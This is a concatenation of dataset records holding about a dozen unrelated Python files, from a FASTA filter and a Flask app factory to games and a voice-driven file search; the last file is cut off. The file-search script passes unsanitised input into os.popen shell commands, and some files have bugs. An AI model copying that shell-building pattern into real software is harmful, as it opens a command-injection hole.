HTMLtoText:\n\n\tdef __init__(self, HTML_string):\n\t\t'''\n\t\t'''\n\n\t\tself.HTML_string = HTML_string\n\n\tdef convert_to_text(self):\n\t\t'''\n\t\t'''\n\n\t\tself.soup = BeautifulSoup(self.HTML_string)\n\t\tjust_text = self.soup.get_text()\n\t\treturn just_text\n\n\n\nif __name__ == '__main__':\n\tu = URLtoHTML(sys.argv[1])\n\t# only_table_tags = SoupStrainer('') # find only tables\n\tconverted_text = u.convert_only_tables()\n\tfinal_tables = u.extract_from_table(converted_text)\n\th = HTMLtoText(final_tables)\n\toutput = h.convert_to_text()\n\n\twith open('tmp.txt', 'w') as file:\n\t\tfile.write(output)\n\n\t# os.system(\"python process.py tmp.txt\")\n","sub_path":"processing/webprocess.py","file_name":"webprocess.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"579202153","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 12 11:56:59 2016\nparses a fasta file by a list to include or exlude. Works with both single and\ncharacter break lines.\nusage: python fasta_parse.py -i [default exclude] FOO.INfasta FOO.OUTfasta\nFOO.headerlist\n\n@author: stsmall\n\"\"\"\n\nfrom itertools import groupby\nimport argparse\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='selects headers and'\n 'sequeces from fasta file')\n parser.add_argument('-i', '--include', action='store_true',\n help='this option excludes the header list')\n parser.add_argument('INfasta_file', metavar=\"INfasta\", type=str,\n help='path to fasta IN file')\n parser.add_argument('OUTfasta_file', metavar=\"OUTfasta\", type=str,\n help='path to fasta OUT file')\n parser.add_argument('header_list', metavar=\"header\", type=str,\n help='path to fasta OUT file')\n args = parser.parse_args()\n return(args)\n\n\ndef fasta_iter(fasta_IN_name):\n \"\"\"\n given a fasta file. yield tuples of header, sequence\n \"\"\"\n fh = open(fasta_IN_name)\n # ditch the boolean (x[0]) and just keep the header or sequence since\n # we know they alternate.\n faiter = (x[1] for x in groupby(fh, lambda line: line[0] == \">\"))\n for header in faiter:\n # drop the \">\"\n header = header.next()[1:].strip()\n # join all sequence lines to one.\n seq = \"\".join(s.strip() for s in faiter.next())\n yield header, seq\n\n\ndef make_headerlist(header_clude):\n header_parse = []\n with open(header_clude) as header:\n for line in header:\n header_parse.append(line.split()[0])\n # if line.startswith(\">\"):\n return(header_parse)\n\n\nif __name__ == '__main__':\n args = get_args()\n f = open(args.OUTfasta_file)\n header_parse = make_headerlist(args.header_list)\n if args.include:\n for header in fasta_iter(args.INfasta_file):\n if header[0] in header_parse:\n f.write(\">%s\\n%s\\n\" % (header[0], header[1]))\n else:\n for header in fasta_iter(args.INfasta_file):\n if header[0] not in header_parse:\n f.write(\">%s\\n%s\\n\" % (header[0], header[1]))\n f.close()\n","sub_path":"fasta_tools/fasta_parse.py","file_name":"fasta_parse.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"213434604","text":"from zzcore import StdAns, mysakuya\nimport requests\n\nfrom config import LOLIKEY\n\nclass Ans(StdAns):\n AllowGroup = [ 805197917,343700338,125733077,1084566280,920863253,798595664,655057127,196268763, 204097403, 247022495, 474907856]\n def GETMSG(self):\n url = 'https://api.lolicon.app/setu/'\n params = {\n 'apikey': LOLIKEY,\n }\n\n if len(self.parms) < 2: \n try:\n resp = requests.get(url=url,params=params).json()\n quota = str(resp['quota'])\n seconds = resp['quota_min_ttl']\n m, s = divmod(seconds, 60)\n h, m = divmod(m, 60)\n quota_min_ttl = f'{h}时{m}分{s}秒'\n picurl = resp['data'][0]['url']\n msg = f\"[CQ:reply,id={self.raw_msg['message_id']}][CQ:image,file={picurl}]\\n剩余次数 {quota}\\n距离回复元气 {quota_min_ttl}\"\n except Exception as e:\n print(e)\n msg = '什么东西坏掉了,大概是Pixiv吧...不可能是咱!'\n return msg\n\n else:\n keyword = self.parms[1]\n if mysakuya(self, keyword) == False:\n return \"不许你们看咲夜的涩图!!\"\n \n params['keyword'] = keyword\n try:\n resp = requests.get(url=url,params=params).json()\n picurl = resp['data'][0]['url']\n msg = '[CQ:reply,id=' + str(self.raw_msg['message_id']) + ']' + '咱帮你🔍 ' + keyword + ' 找到了这个\\n' + picurl\n\n if len(self.parms) > 2 and self.parms[2] == 'p' :\n msg = '[CQ:image,file=' + picurl + ']'\n # .replace('https://i.pixiv.cat', 'https://pximg.sihuan.workers.dev')\n # msg = picurl.replace('https://i.pixiv.cat', 'https://original.img.cheerfun.dev')\n except Exception as e:\n print(e)\n msg = '[CQ:reply,id=' + str(self.raw_msg['message_id']) + ']咱没查到 ' + keyword + ' 也有可能是Pixiv坏掉了'\n return msg\n","sub_path":"worker/lsp.py","file_name":"lsp.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"99628738","text":"from os import path\nfrom tests.cli import util\nfrom tests import testcase\n\nSYMSTORE_PATH = \"dummy\"\n\n\nclass TestInvalidPEFile(testcase.TestCase):\n def assertInvalidPEMsg(self, retcode, msg, type, filename):\n self.assertEqual(retcode, 1)\n self.assertRegex(msg.decode(),\n \".*%s: invalid %s file:.*\\n\" %\n (filename, type), \"unexpected error message\")\n\n def test_empty_exe(self):\n \"\"\"\n will hit 'reading beyond end of file error\"\n \"\"\"\n retcode, stderr = util.run_script(SYMSTORE_PATH, [\"empty.exe\"])\n self.assertInvalidPEMsg(retcode, stderr, \"PE\", \"empty.exe\")\n\n def test_invalid_exe(self):\n retcode, stderr = util.run_script(SYMSTORE_PATH, [\"invalid.exe\"])\n self.assertInvalidPEMsg(retcode, stderr, \"PE\", \"invalid.exe\")\n\n def test_invalid_pdb(self):\n retcode, stderr = util.run_script(SYMSTORE_PATH, [\"invalid.pdb\"])\n self.assertInvalidPEMsg(retcode, stderr, \"PDB\", \"invalid.pdb\")\n\n\nclass TestTransactionNotFound(util.CliTester):\n initial_dir_zip = \"existing_store.zip\"\n\n def test_del_unknown_transaction(self):\n \"\"\"\n test deleting non-existing transaction\n \"\"\"\n retcode, stderr = util.run_script(SYMSTORE_PATH, [],\n [\"--delete\", \"0000000042\"])\n self.assertEqual(retcode, 1)\n self.assertRegex(stderr.decode(),\n \"no transaction with id '0000000042' found\")\n\n\nclass TestUnknownExtension(testcase.TestCase):\n def assertErrorMsg(self, retcode, stderr, filename, msg):\n self.assertEqual(retcode, 1)\n self.assertRegex(stderr.decode(),\n \".*%s: %s, can't figure out file format%s\" %\n (filename, msg, util.line_end()),\n \"unexpected error message\")\n\n def test_no_extension(self):\n filename = \"no_extension\"\n retcode, stderr = util.run_script(SYMSTORE_PATH, [filename])\n self.assertErrorMsg(retcode, stderr, filename,\n \"no file extension\")\n\n def test_unknown_extension(self):\n filename = \"unknown.ext\"\n retcode, stderr = util.run_script(SYMSTORE_PATH, [filename])\n self.assertErrorMsg(retcode, stderr, filename,\n \"unknown file extension 'ext'\")\n\n\nclass TestFileNotFound(testcase.TestCase):\n PDB_FILE = \"noexist.pdb\"\n PE_FILE = \"noexist.exe\"\n\n def test_pdb_not_found(self):\n # full path to our non-existing file\n pdb_path = path.join(util.SYMFILES_DIR, self.PDB_FILE)\n # make sure file don't exist\n self.assertFalse(path.exists(pdb_path))\n\n # run the script, and check that we get proper error message\n retcode, stderr = util.run_script(SYMSTORE_PATH, [self.PDB_FILE])\n self.assertEqual(retcode, 1)\n self.assertRegex(stderr.decode(), \"No such file: %s\" % pdb_path)\n\n def test_pe_not_found(self):\n # full path to our non-existing file\n exe_path = path.join(util.SYMFILES_DIR, self.PE_FILE)\n # make sure file don't exist\n self.assertFalse(path.exists(exe_path))\n\n # run the script, and check that we get proper error message\n retcode, stderr = util.run_script(SYMSTORE_PATH, [self.PE_FILE])\n self.assertEqual(retcode, 1)\n self.assertRegex(stderr.decode(), \"No such file: %s\" % exe_path)\n","sub_path":"tests/cli/test_errs.py","file_name":"test_errs.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"237190419","text":"import cx_Oracle\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nimport onccfg\n\n\ndef oracle_conn():\n user = onccfg.username\n password = onccfg.password\n sid = cx_Oracle.makedsn(onccfg.host, onccfg.port, sid=onccfg.sid) # host, port, sid\n cstr = f\"oracle://{user}:{password}@{sid}\"\n engine = create_engine(cstr, convert_unicode=False, pool_recycle=10, pool_size=50, echo=False)\n return engine\n\n\ndef read_sql(filename):\n engine = oracle_conn()\n sql_file = open(filename, \"r\")\n query = sql_file.read()\n sql_file.close()\n df_from_sql = pd.DataFrame(pd.read_sql_query(query, engine))\n df_from_sql.columns = map(str.upper, df_from_sql.columns)\n return df_from_sql\n\n\ndef data_prep(source_data):\n df = source_data\n df.rename(columns={df.columns[0]: \"DATETIME\", df.columns[1]: \"ITEMNUM\"}, inplace=True)\n df = df.set_index([\"DATETIME\", \"ITEMNUM\"])\n df.update(df.groupby(level=\"ITEMNUM\").bfill())\n return df\n\n\ndef daily_time_series(clean_dataframe):\n df = (\n clean_dataframe.reset_index()\n .pivot_table(index=\"DATETIME\", columns=\"ITEMNUM\", values=\"INVENTORY\", aggfunc=sum)\n .bfill()\n .unstack()\n .reset_index(name=\"INVENTORY\")\n )\n\n print(df.head(), df.tail())\n\n sum_df = df.groupby(df[\"DATETIME\"]).sum().reset_index()\n sum_df = sum_df[[\"DATETIME\", \"INVENTORY\"]]\n\n print(sum_df.head(), sum_df.tail())\n\n sum_df.to_csv(r\"c:\\users\\uxkp\\desktop\\time_series_test_886.csv\")\n\n\nsql = r\"C:\\Users\\uxkp\\sql_queries\\inventory\\avg_bal.sql\"\ndaily_time_series(data_prep(read_sql(sql)))\n","sub_path":"inventory_summary_past_year.py","file_name":"inventory_summary_past_year.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"511208876","text":"from random import randint, choice, random\nfrom operator import itemgetter\nimport sys\nimport string\nimport argparse\n\n\ndef gen_valid():\n return [randint(1, NUM_TANKS), randint(0, MAX_VALID_COORD),\n randint(0, MAX_VALID_COORD)]\n\n\ndef attack_to_str(tanks, x, y):\n return (\"p\" + \"o\" * tanks + \"int(\", str(x) + \",\" + str(y) + \")\")\n\n\ndef add_comma(p2_str):\n index = randint(0, len(p2_str) - 1)\n if index == 0:\n return \",\"\n return p2_str[:index] + \",\" + p2_str[index:p2_str.find(',') + 1]\n\n\ndef add_open_parens(p2_str):\n index = randint(0, len(p2_str) - 1)\n return p2_str[:index] + \"(\"\n\n \ndef valid_noise_charsets():\n p1_charsets = [list(string.printable), list(string.printable),\n list(string.printable), list(string.printable),\n list(string.printable), list(string.printable)]\n p1_charsets[0].remove('p')\n p1_charsets[1].remove('o')\n p1_charsets[2].remove('o')\n p1_charsets[2].remove('i')\n p1_charsets[3].remove('n')\n p1_charsets[4].remove('t')\n p1_charsets[5].remove('(')\n p2_charset = list(string.printable)\n p2_charset.remove('(')\n p2_charset.remove(')')\n p2_charset.remove(',')\n for i in range(0, 10):\n p2_charset.remove(str(i))\n return p1_charsets, p2_charset\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"num_attacks\", type=int,\n help=\"number of valid attacks to be generated\")\n parser.add_argument(\"-m\", \"--memory\", type=int, default=30,\n help=\"maximum amount of memory to be used, in MB (default: %(default)sMB)\")\n parser.add_argument(\"-o\", \"--output\", action=\"store_true\",\n help=\"generates and prints the expected output to stderr\")\n parser.add_argument(\"-n\", \"--noise\", type=float, default=0.5,\n help=\"proportion of noise to content (default: %(default)s)\")\n parser.add_argument(\"-i\", \"--invalid\", type=float, default=0.2,\n help=\"proportion of invalid inputs to valid ones (default: %(default)s)\")\n parser.add_argument(\"-t\", \"--tanks\", type=int, default=40,\n help=\"maximum amount of tanks per input (default: %(default)s)\")\n parser.add_argument(\"-c\", \"--coordmax\", type=int, default=99999,\n help=\"maximum value for coordinates (default: %(default)s)\")\n args = parser.parse_args()\n\n MAX_VALID_COORD = args.coordmax\n NUM_TANKS = args.tanks\n GEN_OUTPUT = args.output\n INVALID_PROP = args.invalid\n NOISE_PROP = args.noise\n P1_CHARSETS, P2_CHARSET = valid_noise_charsets()\n\n num_attacks = args.num_attacks\n\n print(args.memory) # available memory\n\n base = (randint(0, MAX_VALID_COORD), randint(0, MAX_VALID_COORD))\n print(*base) # base coordinates\n\n if GEN_OUTPUT:\n attacks = []\n\n while num_attacks:\n attack = gen_valid()\n\n if random() < INVALID_PROP: # invalid\n inv_type = randint(1, 4)\n if inv_type == 1:\n attack[1] = randint(100000, 999999)\n elif inv_type == 2:\n attack[2] = randint(100000, 999999)\n p1_str, p2_str = attack_to_str(*attack)\n if inv_type == 1:\n p2_str = p2_str[:6] # 123098|23,2430857\n elif inv_type == 2:\n p2_str = p2_str[:p2_str.find(',') + 7] # 99999,812394|2094\n elif inv_type == 3:\n p2_str = add_comma(p2_str)\n else: # type == 4\n p2_str = add_open_parens(p2_str)\n else:\n if GEN_OUTPUT:\n attacks.append(attack)\n p1_str, p2_str = attack_to_str(*attack)\n num_attacks -= 1\n pos = 0\n\n while pos < len(p1_str):\n if random() < NOISE_PROP:\n if pos < 3:\n curr_charset = P1_CHARSETS[pos]\n elif pos < (2 + attack[0]):\n curr_charset = P1_CHARSETS[2]\n else:\n curr_charset = P1_CHARSETS[pos - attack[0] + 1]\n sys.stdout.write(choice(curr_charset))\n else:\n sys.stdout.write(p1_str[pos])\n pos += 1\n\n pos = 0\n while pos < len(p2_str):\n if random() < NOISE_PROP:\n sys.stdout.write(choice(P2_CHARSET))\n else:\n sys.stdout.write(p2_str[pos])\n pos += 1\n\n sys.stdout.write(\"\\n\")\n\n if GEN_OUTPUT:\n attacks.sort(\n key=lambda a: (base[0] - a[1]) ** 2 + (base[1] - a[2]) ** 2)\n attacks.sort(key=itemgetter(0), reverse=True)\n for attack in attacks:\n print('{0};({1},{2})'.format(*attack), file=sys.stderr)\n","sub_path":"tp1/tools/testgen.py","file_name":"testgen.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"344500543","text":"\"\"\"\n Simple Sine manipulation\n\"\"\"\n# Setup root_logger:\nimport logging as root_logger\nLOGLEVEL = root_logger.DEBUG\nLOG_FILE_NAME = \"log.cairosine\"\nroot_logger.basicConfig(filename=LOG_FILE_NAME, level=LOGLEVEL, filemode='w')\n\nconsole = root_logger.StreamHandler()\nconsole.setLevel(root_logger.INFO)\nroot_logger.getLogger('').addHandler(console)\nlogging = root_logger.getLogger(__name__)\n##############################\n# IMPORTS\n####################\nimport cairo\nimport numpy as np\nimport cairo_utils as utils\nfrom math import pi\nfrom os.path import join,isfile,exists,isdir\nfrom os import listdir\nimport argparse\nimport IPython\n\n##############################\n# CONSTANTS\n####################\nN = 10\nX = pow(2,N)\nY = pow(2,N)\nsurface = cairo.ImageSurface(cairo.FORMAT_ARGB32, X,Y)\nctx = cairo.Context(surface)\nctx.scale(X,Y) #coords in 0-1 range\n\nFILENAME = \"cairo_sine\"\nIMAGE_DIR = \"images\"\n\nSAMPLENUM = 1000\nRADIUS = 0.01\nNUM_OF_FRAMES = 100\n##############################\n# VARIABLES\n####################\nbase_indices = np.linspace(0,2 * pi,SAMPLENUM)\nbase_sine = np.sin(base_indices)\n\nfast_sine = np.linspace(0,2*pi, int(SAMPLENUM * 0.5))\n\n#utility modifiers\nss = lambda s, x : s * x\nos = lambda s, x : s + x\nsos = lambda s, x : (s * x) + x\n\n\n##############################\n# Utilities\n####################\ndef draw(i=0,m=1):\n \"\"\" Draw a single image of a sine wave.\n i : index of the image to write\n m : scaling factor of the image\n \"\"\"\n utils.drawing.clear_canvas(ctx)\n xs = np.linspace(0,1,SAMPLENUM)\n ys = base_sine\n\n #ys = 0.5 + ss((shape(0.5 + ss(ss(ss(base_sine,1.4),m),0.5)) - 0.5),0.8)\n #todo: apply a filter here\n\n\n ys = ss(ys, m)\n ys = ss(ys, 0.5)\n ys = os(ys, 0.5)\n\n ys = shape(ys) \n logging.info(\"{}-{}, {:.2f}-{:.2f}\".format(xs.min(),xs.max(), ys.min(), ys.max())) \n for x,y in zip(xs,ys):\n utils.drawing.drawCircle(ctx,x,y,RADIUS)\n utils.drawing.write_to_png(surface,join(IMAGE_DIR,FILENAME),i)\n\ndef draw_multiple():\n \"\"\" Draw NUM_OF_FRAMES images, scaling from 0 to 1 \"\"\"\n frameNum = range(NUM_OF_FRAMES)\n base_num = list(range(int(NUM_OF_FRAMES * 0.5)))\n rev_num = base_num.copy()\n rev_num.reverse()\n combined = base_num + rev_num\n \n for i,m in zip(frameNum, soft_knee(combined,1.0,2.0,0.3)):\n logging.info(\"Drawing Frame: {}\".format(i))\n draw(i,(m/(NUM_OF_FRAMES*0.2)))\n\n\n#An example shaping function\ndef shape(x): return (4/9 * pow(x,6)) - (17/9 * pow(x,4)) + (22/9 * pow(x,2))\n\n\n# A Simple soft_knee compression curve\n# Source: https://se.mathworks.com/help/audio/ref/compressor-class.html\n# Input: 1d np.array(), Threshold, Ratio, Knee width\ndef soft_knee(i,t,r,k):\n under = np.array([x for x in i if x < (t - k/2)])\n inKnee = np.array([x for x in i if (t - k/2) <= x and x <= (t + k/2)])\n over = np.array([x for x in i if (t + k/2) < x])\n\n k_f = (1/r - 1)\n intermediate = inKnee - t + k/2\n intermediate_pow = pow(intermediate,2)\n k_div_amnt = 2 * k\n k_mod = (k_f * intermediate_pow) / k_div_amnt\n k_red = inKnee + k_mod\n \n over_red = t + ((over - t)) / r\n\n return np.concatenate((under,k_red,over_red))\n\n\n\n##############################\n# Core Functions\n####################\n\n\n#Argparse setup:\nap = argparse.ArgumentParser()\nap.add_argument('-s','--single',help=\"Render just a single image\",\n action=\"store_true\")\n \n########################################\nif __name__ == \"__main__\":\n logging.info(\"Starting \")\n args = ap.parse_args()\n if args.single:\n draw(0,1)\n else:\n draw_multiple()\n","sub_path":"python/cairo/cairoSine.py","file_name":"cairoSine.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"312925119","text":"bif = \"bg.jpg\"\r\nmif = \"ball.png\"\r\n\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\n\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((640, 320), 0, 32)\r\nbackground = pygame.image.load(bif).convert()\r\nball = pygame.image.load(mif).convert_alpha()\r\n\r\nx = 0\r\nclock = pygame.time.Clock()\r\nspeed = 250\r\n\r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n screen.blit(background, (0, 0))\r\n screen.blit(ball, (x, 150))\r\n\r\n # setup spedd and time\r\n # calculate distance move(dm) = speed * time\r\n # add distance move with x co-orident\r\n # move x with given time \r\n milli = clock.tick()\r\n seconds = milli/10000.\r\n dm = seconds * speed\r\n x += dm\r\n\r\n if x > 640:\r\n x = 0\r\n\r\n # make rectangle point\r\n screen.lock()\r\n pygame.draw.rect(screen, (140, 240, 130), Rect((120, 120), (50, 50)))\r\n pygame.draw.rect(screen, (140, 240, 130), Rect((250, 120), (50, 50)))\r\n pygame.draw.rect(screen, (140, 240, 130), Rect((380, 120), (50, 50)))\r\n pygame.draw.rect(screen, (140, 240, 130), Rect((500, 120), (50, 50)))\r\n screen.unlock()\r\n\r\n pygame.display.update()\r\n","sub_path":"animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"642673","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nfrom flask_bcrypt import Bcrypt\nfrom flask_jwt_extended import JWTManager\nfrom flask_redis import FlaskRedis\nfrom redis import ConnectionError\n\nfrom app import config\nfrom app.util.email_sender import EmailSender\n\ndb = SQLAlchemy()\nma = Marshmallow()\nbcrypt = Bcrypt()\njwt = JWTManager()\nredis_client = FlaskRedis()\nemail_sender = EmailSender()\n\n\ndef create_app(config):\n app = Flask(__name__)\n app.config.from_object(config)\n\n from app.api.v1 import v1_blueprint\n app.register_blueprint(v1_blueprint, url_prefix='/api/v1')\n\n\n db.init_app(app)\n ma.init_app(app)\n bcrypt.init_app(app)\n jwt.init_app(app)\n redis_client.init_app(app)\n email_sender.init_app(app)\n\n wait_db_ready(app)\n wait_redis_ready(app)\n\n with app.app_context():\n db.create_all()\n\n\n\n # from app.api.v1.image import image_blueprint\n # from app.api.v1.board import board_blueprint\n # from app.api.v1.user import user_blueprint\n # from app.api.v1.user import account\n #\n # app.register_blueprint(board_blueprint, url_prefix='/api/board')\n # app.register_blueprint(user_blueprint, url_prefix='/api/users')\n # app.register_blueprint(image_blueprint, url_prefix='/api/images')\n\n return app\n\n\nfrom functools import wraps\nfrom flask import jsonify\nfrom flask_jwt_extended import verify_jwt_in_request, get_jwt_claims\n\ndef admin_required(fn):\n @wraps(fn)\n def wrapper(*args, **kwargs):\n verify_jwt_in_request()\n claims = get_jwt_claims()\n if not claims['roles'] == 'admin':\n return jsonify(msg='Access denied, admin only!'), 403\n else:\n return fn(*args, **kwargs)\n\n return wrapper\n\n\nimport time\nfrom sqlalchemy.exc import OperationalError\nfrom sqlalchemy.sql import text\n\ndef wait_db_ready(app):\n wait_db_ready.num_of_try = 0\n\n while True:\n try:\n with app.app_context():\n db.session.query(\"1\").from_statement(text(\"SELECT 1\")).all()\n return True\n except OperationalError:\n time.sleep(.5)\n if wait_db_ready.num_of_try >= 20:\n raise Exception('db not work!')\n else:\n wait_db_ready.num_of_try += 1\n continue\n except Exception as e:\n raise e\n\n\ndef wait_redis_ready(app):\n wait_db_ready.num_of_try = 0\n\n while True:\n try:\n with app.app_context():\n redis_client.ping()\n return True\n except ConnectionError:\n time.sleep(.5)\n if wait_db_ready.num_of_try >= 20:\n raise Exception('redis not work!')\n else:\n wait_db_ready.num_of_try += 1\n continue\n except Exception as e:\n raise e\n\n\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"268306940","text":"\"\"\"Module provides CruxConfig object to manage API configuration settings.\"\"\"\n\nimport os\nimport platform\nimport re\nfrom typing import ( # noqa: F401 pylint: disable=unused-import\n Dict,\n MutableMapping,\n Optional,\n Text,\n Union,\n)\n\nimport requests\n\nfrom crux.__version__ import __version__\n\n\nclass CruxConfig(object):\n \"\"\"\n Crux Configuration Class.\n \"\"\"\n\n def __init__(\n self,\n api_key=None, # type: Optional[str]\n api_host=None, # type: str\n api_prefix=None, # type: str\n proxies=None, # type: Optional[MutableMapping[Text, Text]]\n user_agent=None, # type: str\n ):\n # type: (...) -> None\n \"\"\"\n Args:\n api_key (str): API Key. Defaults to None.\n api_host (str): API URL. Defaults to None.\n api_prefix (str): API prefix to be used. Defaults to None.\n proxies (dict): Proxies to be used. Defaults to None.\n user_agent (str): User agent to be used. Defaults to None.\n\n Raises:\n ValueError: If CRUX_AP_KEY is not set.\n \"\"\"\n self.re_user_agent_banned_chars = re.compile(r\"[^a-zA-Z0-9._+~-]\")\n self.re_whitespace_runs = re.compile(r\"\\s+\")\n\n if api_key is None:\n if \"CRUX_API_KEY\" in os.environ:\n self.api_key = os.environ.get(\"CRUX_API_KEY\") # type: Optional[str]\n else:\n raise ValueError(\"API KEY is required\")\n else:\n self.api_key = api_key # type: Optional[str]\n\n if api_host is None:\n self.api_host = os.environ.get(\n \"CRUX_API_HOST\", \"https://api.cruxinformatics.com\"\n )\n else:\n self.api_host = api_host\n\n if api_prefix is None:\n self.api_prefix = os.environ.get(\"CRUX_API_PREFIX\", \"plat-api\")\n else:\n self.api_prefix = api_prefix\n\n if user_agent is None:\n self.user_agent = self._default_user_agent()\n else:\n self.user_agent = user_agent\n\n self.proxies = (\n proxies if proxies else {}\n ) # type: Optional[MutableMapping[Text, Text]]\n\n def _default_user_agent(self):\n # type: () -> str\n user_agent = (\n \"crux-python/{ver}\"\n \" requests/{req_ver} {py_impl}/{py_ver} \"\n \"{os}/{os_ver} {cpu}/{machine}\"\n ).format(\n ver=__version__,\n req_ver=self._sanitize_user_agent_part(requests.__version__),\n py_impl=self._sanitize_user_agent_part(platform.python_implementation()),\n py_ver=self._sanitize_user_agent_part(platform.python_version()),\n os=self._sanitize_user_agent_part(platform.system()),\n os_ver=self._sanitize_user_agent_part(platform.release()),\n cpu=self._sanitize_user_agent_part(platform.processor()),\n machine=self._sanitize_user_agent_part(platform.machine()),\n )\n\n return user_agent\n\n def _sanitize_user_agent_part(self, part):\n # type: (str) -> str\n if part:\n no_space_part = self.re_whitespace_runs.sub(\"_\", part)\n sanitized_part = self.re_user_agent_banned_chars.sub(\"\", no_space_part)\n if sanitized_part:\n return sanitized_part\n return \"unknown\"\n","sub_path":"crux/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"534761813","text":"\"\"\"Tic Tac Toe\"\"\"\nimport sys\n\nX, O, BLANK = 'x', 'o', ' '\n\nBOARD_STR = '''\n {} | {} | {} \n-----------\n {} | {} | {} \n-----------\n {} | {} | {} \n'''\n\n\nclass GameOver(Exception):\n \"\"\"Raised when the game ends\"\"\"\n\n\ndef main():\n \"\"\"Runs Tic Tac Toe\"\"\"\n print_instructions()\n\n player_1, player_2 = choose_players()\n\n board = [BLANK] * 9\n\n while True:\n try:\n play_turn(player_1, board)\n play_turn(player_2, board)\n except GameOver:\n break\n\n\ndef print_instructions():\n \"\"\"Print instructions on game start\"\"\"\n print(\n 'Welcome to Tic Tac Toe.\\n'\n 'Board positions are as follows:'\n )\n print_board_positions()\n\n\ndef print_board_positions():\n \"\"\"Prints the board positions\"\"\"\n positions = range(1, 9+1)\n print(BOARD_STR.format(*positions))\n\n\ndef choose_players():\n \"\"\"Chooses the symbols for each player\"\"\"\n while True:\n try:\n input_string = input(\"Choose Player 1 symbol ('x' or 'o'): \")\n except KeyboardInterrupt:\n sys.exit()\n\n input_string = input_string.lower()\n\n if input_string == X:\n return X, O\n\n if input_string == O:\n return O, X\n\n print('Try again.')\n\n\ndef play_turn(player, board):\n \"\"\"Plays one turn of the game, and throws on game over\"\"\"\n print_board(board)\n\n player_input(player, board)\n\n if check_win(player, board):\n print_board(board)\n print(f'Player {player} won!')\n raise GameOver\n\n if check_tie(board):\n print_board(board)\n print('It\\'s a tie!')\n raise GameOver\n\n\ndef print_board(board):\n \"\"\"Prints the board\"\"\"\n print(BOARD_STR.format(*board))\n\n\ndef player_input(player_char, board):\n \"\"\"Takes a position input from the player\"\"\"\n while True:\n try:\n position_input = input(f'{player_char}> ')\n except KeyboardInterrupt:\n sys.exit()\n\n if not position_input.isdigit():\n print('Try again.')\n continue\n\n position = int(position_input) - 1\n\n if position < 0 or position >= len(board):\n print(f'Choose a value between 1 and {len(board)}.')\n continue\n\n if board[position] != BLANK:\n print('Choose an empty cell.')\n continue\n\n board[position] = player_char\n break\n\n\ndef check_win(char, board):\n \"\"\"Checks if a player has won the game\"\"\"\n rows = (\n (0, 1, 2),\n (3, 4, 5),\n (6, 7, 8),\n )\n cols = (\n (0, 3, 6),\n (1, 4, 7),\n (2, 5, 8),\n )\n diags = (\n (2, 4, 6),\n (0, 4, 8),\n )\n\n edges = (*rows, *cols, *diags)\n\n for edge in edges:\n if all(board[index] == char for index in edge):\n return True\n\n return False\n\n\ndef check_tie(board):\n \"\"\"Checks if the game was a tie\"\"\"\n return all(char != BLANK for char in board)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tic.py","file_name":"tic.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"357084977","text":"import os\nimport sys\nimport pyttsx3 as spk\nimport speech_recognition as sr\nfrom word2number import w2n\n\ndef get_index(inst):\n\treturn w2n.word_to_num(inst)\n\ndef open_file(inpt):\n\tos.popen('start /wait \"{pth}\"'.format(pth=y[inpt]))\n\ndef get_response():\n\tspk.speak(\"Which file shall i open for you sir ?\")\n\tr = sr.Recognizer()\n\tmic = sr.Microphone()\n\twith mic as source:\n\t\tr.adjust_for_ambient_noise(source)\n\t\taudio = r.listen(source)\n\tinst = r.recognize_google(audio)\n\tif \"exit\" in inst or \"quit\" in inst or inst == \"bye\" or inst == \"good bye\":\n\t\tspk.speak(\"Good bye sir...\")\n\t\texit()\n\telse:\n\t\tnum = get_index(inst)\n\t\tspk.speak(\"Opening file number \" + str(num))\n\t\topen_file(num)\n\ndef search_any_file(filename):\n\tpths=''\n\tprint(filename)\n\tprint('Searching File....')\n\tpth=os.popen(\"wmic logicaldisk get caption\").read()\n\tdisks = pth.split(\"\\n\\n\")\n\tfor y in range(1,len(disks)):\n\t\tdisks[y]=disks[y].strip()\n\t\tpths+=os.popen(\"dir \"+disks[y]+\"\\\\\"+filename+\".* /b/s\").read()\n\tpaths = pths.split(\"\\n\")\n\treturn paths\n\nfile ='\"'+sys.argv[1]+'\"'\n\ny=search_any_file(file)\n\nspk.speak(\"I found the following files for you...\")\nprint(\"List of files\")\nprint(\"---\" * 35)\nfor z in range(len(y[:-1])):\n\tprint(z+1,\" | \",y[z])\nprint(\"---\" * 35)\n\nwhile 